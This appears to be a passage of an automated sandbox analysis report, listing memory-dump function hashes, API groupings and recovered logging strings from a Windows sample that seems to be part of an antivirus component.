                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 203985260-0
                                      • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                      • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                      • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                      • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                      • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                      • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                      • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                      • Instruction ID: e9611a48fd4434432fc17d37ce069fc89e29e07be7e58e1479d7ad9eb5c21c4f
                                      • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                      • Instruction Fuzzy Hash: B151E822B04A8145FB209BB3B8441BD7BA0BB40FA4F1541B6EE5C27AA5CE7CD0A1C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: EntryFunctionLookup
                                      • String ID:
                                      • API String ID: 3852435196-0
                                      • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                      • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                      • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                      • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                      • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                      • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                      • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0
                                      • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                      • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                      • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                      • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                      • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                      • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                      • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                      • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                      • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                      • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                      • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                      • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                      • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                      • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                      • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                      • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                      • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                      • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                      • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                      • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                      • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                      • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                      • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                      • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                      • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                      • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                      • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                      • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                      • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                      • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                      • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                      • Instruction ID: bfe97d323d14a2700bef11543651f44a66e064034e927a113bf381ebe6dc8064
                                      • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                      • Instruction Fuzzy Hash: C8F068B17196568ADBB48F29B443A3977D0E748791F5481BAD68D83B14D63C90708F04

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                      • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                      • API String ID: 1021822269-3147033232
                                      • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                      • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                      • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                      • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                      • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                      • API String ID: 883923345-381368982
                                      • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                      • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                      • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                      • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                      • String ID:
                                      • API String ID: 1613947383-0
                                      • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                      • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                      • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                      • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                      • String ID:
                                      • API String ID: 1995290849-0
                                      • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                      • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                      • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                      • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                      • String ID:
                                      • API String ID: 1995290849-0
                                      • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                      • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                      • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                      • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                      APIs
                                      Strings
                                      Memory Dump Source
